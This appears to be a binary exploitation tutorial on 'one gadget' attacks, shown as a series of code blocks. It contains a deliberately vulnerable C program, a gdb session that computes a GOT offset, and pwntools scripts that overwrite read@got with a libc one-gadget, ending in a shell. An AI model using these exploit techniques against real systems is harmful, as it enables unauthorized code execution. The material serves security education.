...
Code Block | ||||
---|---|---|---|---|
| ||||
//gcc -fno-stack-protector -o onebaby onebaby.c -ldl #define _GNU_SOURCE #include <sys/types.h> #include <sys/stat.h> #include <unistd.h> #include <stdlib.h> #include <stdio.h> #include <fcntl.h> #include <dlfcn.h> char asdf[1024]; int main() { long long index = 0; void (*printf_addr)() = dlsym(RTLD_NEXT, "printf"); printf("Printf() address : %p\n",printf_addr); read(0, &index, 1024); read(0, asdf+index, 8); read(0, &index, 1024); } |
...
Code Block | ||
---|---|---|
| ||
lazenca0x0@ubuntu:~/Exploit/OneGadgets$ gdb -q ./onebaby Reading symbols from ./onebaby...(no debugging symbols found)...done. gdb-peda$ disassemble main Dump of assembler code for function main: 0x0000000000400676 <+0>: push rbp 0x0000000000400677 <+1>: mov rbp,rsp 0x000000000040067a <+4>: sub rsp,0x10 0x000000000040067e <+8>: mov QWORD PTR [rbp-0x10],0x0 0x0000000000400686 <+16>: mov esi,0x400784 0x000000000040068b <+21>: mov rdi,0xffffffffffffffff 0x0000000000400692 <+28>: call 0x400560 <dlsym@plt> 0x0000000000400697 <+33>: mov QWORD PTR [rbp-0x8],rax 0x000000000040069b <+37>: mov rax,QWORD PTR [rbp-0x8] 0x000000000040069f <+41>: mov rsi,rax 0x00000000004006a2 <+44>: mov edi,0x40078b 0x00000000004006a7 <+49>: mov eax,0x0 0x00000000004006ac <+54>: call 0x400530 <printf@plt> 0x00000000004006b1 <+59>: lea rax,[rbp-0x10] 0x00000000004006b5 <+63>: mov edx,0x400 0x00000000004006ba <+68>: mov rsi,rax 0x00000000004006bd <+71>: mov edi,0x0 0x00000000004006c2 <+76>: call 0x400540 <read@plt> 0x00000000004006c7 <+81>: mov rax,QWORD PTR [rbp-0x10] 0x00000000004006cb <+85>: add rax,0x601080 0x00000000004006d1 <+91>: mov edx,0x8 0x00000000004006d6 <+96>: mov rsi,rax 0x00000000004006d9 <+99>: mov edi,0x0 0x00000000004006de <+104>: call 0x400540 <read@plt> 0x00000000004006e3 <+109>: lea rax,[rbp-0x10] 0x00000000004006e7 <+113>: mov edx,0x400 0x00000000004006ec <+118>: mov rsi,rax 0x00000000004006ef <+121>: mov edi,0x0 0x00000000004006f4 <+126>: call 0x400540 <read@plt> 0x00000000004006f9 <+131>: mov eax,0x0 0x00000000004006fe <+136>: leave 0x00000000004006ff <+137>: ret End of assembler dump. gdb-peda$ b *0x00000000004006c2 Breakpoint 1 at 0x4006c2 gdb-peda$ b *0x00000000004006de Breakpoint 2 at 0x4006de gdb-peda$ b *0x00000000004006f4 Breakpoint 3 at 0x4006f4 gdb-peda$ |
...
Code Block | ||
---|---|---|
| ||
gdb-peda$ r Starting program: /home/lazenca0x0/Exploit/OneGadgets/onebaby Printf() address : 0x7ffff785e800 Breakpoint 1, 0x00000000004006c2 in main () gdb-peda$ ni AAAAAAAAAAAAAAAA 0x00000000004006c7 in main () gdb-peda$ ni 0x00000000004006cb in main () gdb-peda$ x/i $rip => 0x4006cb <main+85>: add rax,0x601080 gdb-peda$ i r rax rax 0x4141414141414141 0x4141414141414141 gdb-peda$ p/x 0x4141414141414141 + 0x601080 $6 = 0x4141414141a151c1 gdb-peda$ p/x 0xffffffffffffffff + 0x601080 $7 = 0x60107f gdb-peda$ elfsymbol read Detail symbol info read@reloc = 0x1 read@plt = 0x400540 read@got = 0x601020 gdb-peda$ p/x 0x601020 - 0x601080 $8 = 0xffffffa0 gdb-peda$ p/x 0xffffffffffffffa0 + 0x601080 $9 = 0x601020 gdb-peda$ |
...
Code Block | ||||
---|---|---|---|---|
| ||||
from pwn import * p = process('./onebaby') p.recvuntil('Printf() address : ') libcAddr = p.recvuntil('\n') libcAddr = int(libcAddr,16) libcBase = libcAddr - 0x55800 oneGadget = libcBase + 0x4526a inputValue = int(str(hex(oneGadget))[-4:],16) log.info('libcBase Addr : '+hex(libcBase)) log.info('oneGadget Addr : '+hex(oneGadget)) log.info('Input value : '+hex(inputValue)) p.sendline(p64(0xffffffffffffffa0)) sleep(0.5) p.sendline(p64(oneGadget)) p.interactive() |
...
Code Block | ||
---|---|---|
| ||
lazenca0x0@ubuntu:~/Exploit/OneGadgets$ python Exploit.py [+] Starting local process './onebaby': pid 17043 [*] libcBase Addr : 0x7f0dde749000 [*] oneGadget Addr : 0x7f0dde78e26a [*] Input value : 0xe26a [*] Switching to interactive mode $ [*] Got EOF while reading in interactive $ [*] Process './onebaby' stopped with exit code -11 (SIGSEGV) (pid 17043) [*] Got EOF while sending in interactive lazenca0x0@ubuntu:~/Exploit/OneGadgets$ |
...
Code Block | ||
---|---|---|
| ||
lazenca0x0@ubuntu:~/Exploit/OneGadgets$ python Exploit.py [+] Starting local process './onebaby': pid 15978 [*] libcBase Addr : 0x7f930739d000 [*] oneGadget Addr : 0x7f93073e2216 [*] Input value : 0x2216 [*] Switching to interactive mode $ |
...
Code Block | ||||
---|---|---|---|---|
| ||||
from pwn import * p = process('./one') p.recvuntil('Printf() address : ') libcAddr = p.recvuntil('\n') libcAddr = int(libcAddr,16) libcBase = libcAddr - 0x55800 oneGadget = libcBase + 0x4526a inputValue = int(str(hex(oneGadget))[-4:],16) log.info('libcBase Addr : '+hex(libcBase)) log.info('oneGadget Addr : '+hex(oneGadget)) log.info('Input value : '+hex(inputValue)) p.sendline(p64(0xffffffffffffffa8)) sleep(0.5) p.sendline(p64(oneGadget)) p.interactive() |
...
Code Block | ||
---|---|---|
| ||
lazenca0x0@ubuntu:~/Exploit/OneGadgets$ python Exploitexploit-2.py [+] Starting local process './one': pid 18745 [*] libcBase Addr : 0x7f10b5ed8000 [*] oneGadget Addr : 0x7f10b5f1d26a [*] Input value : 0xd26a [*] Switching to interactive mode $ id uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) $ |
...